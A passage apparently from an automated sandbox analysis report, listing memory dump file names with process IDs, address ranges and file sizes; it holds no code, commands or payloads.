-
memory/4256-1121-0x00000000028E0000-0x00000000028F0000-memory.dmp
Filesize
64KB
-
memory/4256-299-0x00000000028E0000-0x00000000028F0000-memory.dmp
Filesize
64KB
-
memory/4256-298-0x0000000004D60000-0x000000000525E000-memory.dmp
Filesize
5.0MB
-
memory/4256-301-0x0000000002870000-0x00000000028C6000-memory.dmp
Filesize
344KB
-
memory/4256-300-0x00000000028E0000-0x00000000028F0000-memory.dmp
Filesize
64KB
-
memory/4256-1104-0x00000000054B0000-0x00000000054FB000-memory.dmp
Filesize
300KB
-
memory/4256-302-0x0000000002870000-0x00000000028C2000-memory.dmp
Filesize
328KB
-
memory/4256-303-0x0000000002870000-0x00000000028C2000-memory.dmp
Filesize
328KB
-
memory/4256-1103-0x0000000005420000-0x000000000545E000-memory.dmp
Filesize
248KB
-
memory/4256-1102-0x0000000005310000-0x000000000541A000-memory.dmp
Filesize
1.0MB
-
memory/4256-307-0x0000000002870000-0x00000000028C2000-memory.dmp
Filesize
328KB
-
memory/4256-309-0x0000000002870000-0x00000000028C2000-memory.dmp
Filesize
328KB
-
memory/4256-1101-0x00000000052E0000-0x00000000052F2000-memory.dmp
Filesize
72KB
-
memory/4256-1100-0x0000000005870000-0x0000000005E76000-memory.dmp
Filesize
6.0MB
-
memory/4256-311-0x0000000002870000-0x00000000028C2000-memory.dmp
Filesize
328KB
-
memory/4256-322-0x0000000002870000-0x00000000028C2000-memory.dmp
Filesize
328KB
-
memory/4256-313-0x0000000002870000-0x00000000028C2000-memory.dmp
Filesize
328KB
-
memory/4256-315-0x0000000002870000-0x00000000028C2000-memory.dmp
Filesize
328KB
-
memory/4256-317-0x0000000002870000-0x00000000028C2000-memory.dmp
Filesize
328KB
-
memory/4256-319-0x0000000002870000-0x00000000028C2000-memory.dmp
Filesize
328KB
-
memory/4280-135-0x00000000048D0000-0x00000000049EB000-memory.dmp
Filesize
1.1MB
-
memory/4296-136-0x0000000000400000-0x0000000000537000-memory.dmp
Filesize
1.2MB
-
memory/4296-138-0x0000000000400000-0x0000000000537000-memory.dmp
Filesize
1.2MB
-
memory/4296-139-0x0000000000400000-0x0000000000537000-memory.dmp
Filesize
1.2MB
-
memory/4296-140-0x0000000000400000-0x0000000000537000-memory.dmp
Filesize
1.2MB
-
memory/4296-161-0x0000000000400000-0x0000000000537000-memory.dmp
Filesize
1.2MB
-
memory/4308-1190-0x0000000000840000-0x0000000000849000-memory.dmp
Filesize
36KB
-
memory/4308-1189-0x00000000010B0000-0x00000000010BF000-memory.dmp
Filesize
60KB
-
memory/4348-1166-0x0000000000650000-0x000000000065B000-memory.dmp
Filesize
44KB
-
memory/4508-156-0x0000000000830000-0x0000000000839000-memory.dmp
Filesize
36KB
-
memory/4508-186-0x0000000000400000-0x0000000000704000-memory.dmp
Filesize
3.0MB
-
memory/4676-1235-0x0000000000730000-0x0000000000757000-memory.dmp
Filesize
156KB
-
memory/4676-1233-0x00000283AA010000-0x00000283AA020000-memory.dmp
Filesize
64KB
-
memory/4820-273-0x0000000000400000-0x0000000002B72000-memory.dmp
Filesize
39.4MB
-
memory/4860-1270-0x0000000006EC0000-0x0000000006ED0000-memory.dmp
Filesize
64KB
-
memory/4896-1165-0x0000000006D20000-0x0000000006D30000-memory.dmp
Filesize
64KB
-
memory/4896-1198-0x0000000006D20000-0x0000000006D30000-memory.dmp
Filesize
64KB
-
memory/4896-1163-0x0000000006D20000-0x0000000006D30000-memory.dmp
Filesize
64KB
-
memory/4896-1160-0x0000000007360000-0x0000000007988000-memory.dmp
Filesize
6.2MB
-
memory/4896-1159-0x0000000001240000-0x0000000001276000-memory.dmp
Filesize
216KB
-
memory/4896-1228-0x000000000A550000-0x000000000A596000-memory.dmp
Filesize
280KB
-
memory/4896-1212-0x0000000009010000-0x000000000901A000-memory.dmp
Filesize
40KB
-
memory/4896-1167-0x0000000006FF0000-0x0000000007012000-memory.dmp
Filesize
136KB
-
memory/4896-1209-0x0000000009060000-0x000000000907A000-memory.dmp
Filesize
104KB
-
memory/4896-1208-0x000000000A970000-0x000000000AFE8000-memory.dmp
Filesize
6.5MB
-
memory/4896-1168-0x0000000007230000-0x0000000007296000-memory.dmp
Filesize
408KB
-
memory/4896-1170-0x0000000007B70000-0x0000000007EC0000-memory.dmp
Filesize
3.3MB
-
memory/4896-1174-0x0000000007A50000-0x0000000007A6C000-memory.dmp
Filesize
112KB
-
memory/4900-282-0x0000000003580000-0x00000000036B4000-memory.dmp
Filesize
1.2MB
-
memory/4900-257-0x0000000003400000-0x0000000003573000-memory.dmp
Filesize
1.4MB
-
memory/4900-258-0x0000000003580000-0x00000000036B4000-memory.dmp
Filesize
1.2MB
-
memory/4960-1245-0x0000000003520000-0x0000000003529000-memory.dmp
Filesize
36KB
-
memory/5088-280-0x00007FF62FE20000-0x00007FF6301DD000-memory.dmp
Filesize
3.7MB